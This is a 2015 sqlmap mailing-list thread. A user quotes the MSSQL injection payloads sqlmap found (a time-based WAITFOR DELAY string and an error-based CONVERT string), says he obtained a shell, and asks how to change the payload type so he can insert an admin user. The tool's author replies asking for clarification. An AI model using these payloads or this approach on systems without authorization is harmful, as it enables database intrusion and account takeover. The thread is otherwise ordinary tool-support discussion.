Re: [sqlmap-users] Change Payload ,Insert problem
From: Miroslav S. <mir...@gm...> - 2015-02-09 12:19:59
Really not sure what you are trying to do. Do you want that "error-based" query to be part of "stacked-query" or what?

Bye

On Mon, Feb 9, 2015 at 12:24 AM, a dehqan <deh...@gm...> wrote:

> Maybe my question isn't clear, let me try again:
>
> I need to change stack query to not using timebase detection?
>
> Sqlmap detects injection there by error base type too, like this:
>
> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN
> (9622=9622) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV
>
> How can I have this payload with type of stack query
>
> Regards
>
> On Mon, Feb 9, 2015 at 2:42 AM, a dehqan <deh...@gm...> wrote:
>
>> Guys, is there any chance?
>>
>> Thanks in advance
>>
>> On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote:
>>
>>> I mean how may I have custom payload:
>>>
>>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT
>>> CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN
>>> (9622=9622) THEN CHAR(49) ELSE CHAR(48)
>>> END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV
>>>
>>> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote:
>>>
>>>> Hi
>>>>
>>>> sqlmap gave me shell with injection type of stack queries, but
>>>> Payload is like this:
>>>>
>>>> id=6&rid=1'; WAITFOR DELAY '0:0:5'--
>>>>
>>>> When I want insert with admin user sqlmap returns NULL and fails,
>>>> Only says this before trying:
>>>>
>>>> [WARNING] time-based comparison requires larger statistical model,
>>>> please wait..............................
>>>>
>>>> Maybe I should change Payload, with what switch can I change payload?
>>>>
>>>> Regards

--
Miroslav Stampar
http://about.me/stamparm